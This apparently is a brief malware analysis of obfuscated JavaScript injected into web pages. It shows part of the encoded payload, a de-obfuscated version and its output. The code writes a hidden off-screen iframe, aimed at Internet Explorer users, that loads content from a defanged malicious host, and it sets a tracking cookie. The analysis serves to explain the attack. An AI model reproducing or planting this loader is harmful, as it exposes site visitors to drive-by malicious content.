37,92,95,116,114,106,102,113,59,36,41,60,59,42,49,40,121,97,111,98,115,106,101,109,114,43,99,110,109,104,105,100,59,36,95,94,115,113,109,101,112,58,39,42,112,112,40, 40,41,36,59,31,99,117,112,104,112,98,115,60,37,40,101,119,110,43,116,110,69,74,84,82,114,111,105,109,101,37,41,42,37,56,32,111,95,113,104,60,45,36,59,124,11,7,125);} w=f;s=[];for(i=0;-i+709!=0;i+=1){j=i;if((031==0x19))if(e)s=s+St​ring.from​CharCode((1*w[j]+e("j%4")));}xz=e;xz(s)}

A "de-obfuscation" of the JavaScript and the purpose of the code becomes clear

function gra(a, b){
return Math.floor(Math.random() * (b - a + 1)) + a;
}
function rs(){
return Math.random().toString(36).substring(5);
}
if (navigator.cookieEnabled){
var stnm = rs();
var ua = navigator.userAgent;
if (ua.indexOf('Windows') !=- 1 && ua.indexOf('MSIE') !=- 1){
document.write('<style>.s' + stnm + ' { position:absolute; left:-' + gra(600, 1000) + 'px; top:-' + gra(600, 1000) + 'px; }</style> <div class="s' + stnm + '"><iframe src="hxxp://leenhjxsy.myfw.us/ad/feed.php" width="' + gra(300, 600) + '" height="' + gra(300, 600) + '"></iframe></div>');
}
var exp = new Date();
exp.setDate(exp.getDate() + 7);
if (document.cookie.indexOf('__utmfr=') ==- 1){
document.cookie = '__utmfr=' + rs() + '; expires=' + exp.toGMTString() + '; path=/';
}
}

When the JavaScript is executed by the users browser we get a hidden iframe loading malicious content from another site.

<style>.sot719io4 { position:absolute; left:-806px; top:-869px; }</style> <div class="sot719io4"> <iframe src="hxxp:// leenhjxsy . myfw . us /ad/feed.php" width="564" height="303"></iframe></div>